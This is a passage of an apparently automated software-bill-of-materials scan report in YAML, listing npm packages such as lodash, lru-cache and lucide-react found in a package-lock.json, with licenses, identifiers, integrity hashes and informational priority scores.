severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4752919bcee27237 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash 4.18.1' title: lodash 4.18.1 description: 'Package discovered: lodash 4.18.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ac9c211256bf6980 name: lodash version: 4.18.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash:lodash:4.18.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/lodash@4.18.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz integrity: sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 89713df98a2beb75 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.camelcase 4.3.0' title: lodash.camelcase 4.3.0 description: 'Package discovered: lodash.camelcase 4.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a5b985768ef9b9f6 name: lodash.camelcase version: 4.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.camelcase:lodash.camelcase:4.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.camelcase@4.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.camelcase/-/lodash.camelcase-4.3.0.tgz integrity: sha512-TwuEnCnxbc3rAvhf/LbG7tJUDzhqXyFnv3dtzLOPgCG/hODL7WFnsbwktkD7yUV0RrreP/l1PALq/YSg6VvjlA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4b1d67018d50050d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.clonedeep 4.5.0' title: lodash.clonedeep 4.5.0 description: 'Package discovered: lodash.clonedeep 4.5.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 1fdd3c59e36d5b0f name: lodash.clonedeep version: 4.5.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.clonedeep:lodash.clonedeep:4.5.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.clonedeep@4.5.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.clonedeep/-/lodash.clonedeep-4.5.0.tgz integrity: sha512-H5ZhCF25riFd9uB5UCkVKo61m3S/xZk1x4wA6yp/L3RFP6Z/eHH1ymQcGLo7J3GMPfm0V/7m1tryHuGVxpqEBQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6ee3a377a52860b5 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.defaults 4.2.0' title: lodash.defaults 4.2.0 description: 'Package discovered: lodash.defaults 4.2.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 59a8c664dfef6c46 name: lodash.defaults version: 4.2.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.defaults:lodash.defaults:4.2.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.defaults@4.2.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.defaults/-/lodash.defaults-4.2.0.tgz integrity: sha512-qjxPLHd3r5DnsdGacqOMU6pb/avJzdh9tFX2ymgoZE27BmjXrNy/y4LoaiTeAb+O3gL8AfpJGtqfX/ae2leYYQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a3b4683fdc629aef ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.includes 4.3.0' title: lodash.includes 4.3.0 description: 'Package discovered: lodash.includes 4.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: aa93a44741b08e66 name: lodash.includes version: 4.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.includes:lodash.includes:4.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.includes@4.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.includes/-/lodash.includes-4.3.0.tgz integrity: sha512-W3Bx6mdkRTGtlJISOvVD/lbqjTlPPUDTMnlXZFnVwi9NKJ6tiAk6LVdlhZMm17VZisqhKcgzpO5Wz91PCt5b0w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c512306c360b6fda ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isarguments 3.1.0' title: lodash.isarguments 3.1.0 description: 'Package discovered: lodash.isarguments 3.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c84bded77fb6b828 name: lodash.isarguments version: 3.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isarguments:lodash.isarguments:3.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isarguments@3.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isarguments/-/lodash.isarguments-3.1.0.tgz integrity: sha512-chi4NHZlZqZD18a0imDHnZPrDeBbTtVN7GXMwuGdRH9qotxAjYs3aVLKc7zNOG9eddR5Ksd8rvFEBc9SsggPpg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f0317f2d62f56421 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isboolean 3.0.3' title: lodash.isboolean 3.0.3 description: 'Package discovered: lodash.isboolean 3.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: df154b64f7d4588a name: lodash.isboolean version: 3.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isboolean:lodash.isboolean:3.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isboolean@3.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isboolean/-/lodash.isboolean-3.0.3.tgz integrity: sha512-Bz5mupy2SVbPHURB98VAcw+aHh4vRV5IPNhILUCsOzRmsTmSQ17jIuqopAentWoehktxGd9e/hbIXq980/1QJg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2ae1d391a80c5a72 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isinteger 4.0.4' title: lodash.isinteger 4.0.4 description: 'Package discovered: lodash.isinteger 4.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e92c8ae8d8c83e78 name: lodash.isinteger version: 4.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isinteger:lodash.isinteger:4.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isinteger@4.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isinteger/-/lodash.isinteger-4.0.4.tgz integrity: sha512-DBwtEWN2caHQ9/imiNeEA5ys1JoRtRfY3d7V9wkqtbycnAmTvRRmbHKDV4a0EYc678/dia0jrte4tjYwVBaZUA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0e12d10e43707e74 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isnumber 3.0.3' title: lodash.isnumber 3.0.3 description: 'Package discovered: lodash.isnumber 3.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 32689628126e866e name: lodash.isnumber version: 3.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isnumber:lodash.isnumber:3.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isnumber@3.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isnumber/-/lodash.isnumber-3.0.3.tgz integrity: sha512-QYqzpfwO3/CWf3XP+Z+tkQsfaLL/EnUlXWVkIk5FUPc4sBdTehEqZONuyRt2P67PXAk+NXmTBcc97zw9t1FQrw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f1231b7e60dd673c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isplainobject 4.0.6' title: lodash.isplainobject 4.0.6 description: 'Package discovered: lodash.isplainobject 4.0.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a6b14f73240e0d01 name: lodash.isplainobject version: 4.0.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isplainobject:lodash.isplainobject:4.0.6:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isplainobject@4.0.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isplainobject/-/lodash.isplainobject-4.0.6.tgz integrity: sha512-oSXzaWypCMHkPC3NvBEaPHf0KsA5mvPrOPgQWDsbg8n7orZ290M0BmC/jgRZ4vcJ6DTAhjrsSYgdsW/F+MFOBA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 1ec5aad22a5b316a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.isstring 4.0.1' title: lodash.isstring 4.0.1 description: 'Package discovered: lodash.isstring 4.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f161741909d3d58f name: lodash.isstring version: 4.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.isstring@4.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7962026049b4f49e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lodash.once 4.1.1' title: lodash.once 4.1.1 description: 'Package discovered: lodash.once 4.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: f5ead8ead936acd7 name: lodash.once version: 4.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lodash.once@4.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz integrity: sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: cf9c5c396fa8379f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: long 5.3.2' title: long 5.3.2 description: 'Package discovered: long 5.3.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 22165934193ce3c8 name: long version: 5.3.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/long@5.3.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/long/-/long-5.3.2.tgz integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 4615c5000eb45f3d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: loose-envify 1.4.0' title: loose-envify 1.4.0 description: 'Package discovered: loose-envify 1.4.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 01ac139389c8bf08 name: loose-envify version: 1.4.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/loose-envify@1.4.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz integrity: sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q== dependencies: js-tokens: ^3.0.0 || ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 8bf9ffa72cfbe889 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lru-cache 10.4.3' title: lru-cache 10.4.3 description: 'Package discovered: lru-cache 10.4.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: d68cb2f643232396 name: lru-cache version: 10.4.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/lru-cache@10.4.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a08719993444a9bd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lru-cache 6.0.0' title: lru-cache 6.0.0 description: 'Package discovered: lru-cache 6.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3a3d54b6437f39f3 name: lru-cache version: 6.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/lru-cache@6.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz integrity: sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA== dependencies: yallist: ^4.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fb9befbc81581725 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lru-memoizer 2.3.0' title: lru-memoizer 2.3.0 description: 'Package discovered: lru-memoizer 2.3.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: adf63f866928cf12 name: lru-memoizer version: 2.3.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lru-memoizer@2.3.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz integrity: sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug== dependencies: lodash.clonedeep: ^4.5.0 lru-cache: 6.0.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 03f163b26dd00375 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: lucide-react 0.376.0' title: lucide-react 0.376.0 description: 'Package discovered: lucide-react 0.376.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9a372e50af0fe0ae name: lucide-react version: 0.376.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/lucide-react@0.376.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz integrity: sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0f65ff516206127f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: math-intrinsics 1.1.0' title: math-intrinsics 1.1.0 description: 'Package discovered: math-intrinsics 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 87a83232f7674dbc name: math-intrinsics version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/math-intrinsics@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz integrity: sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: 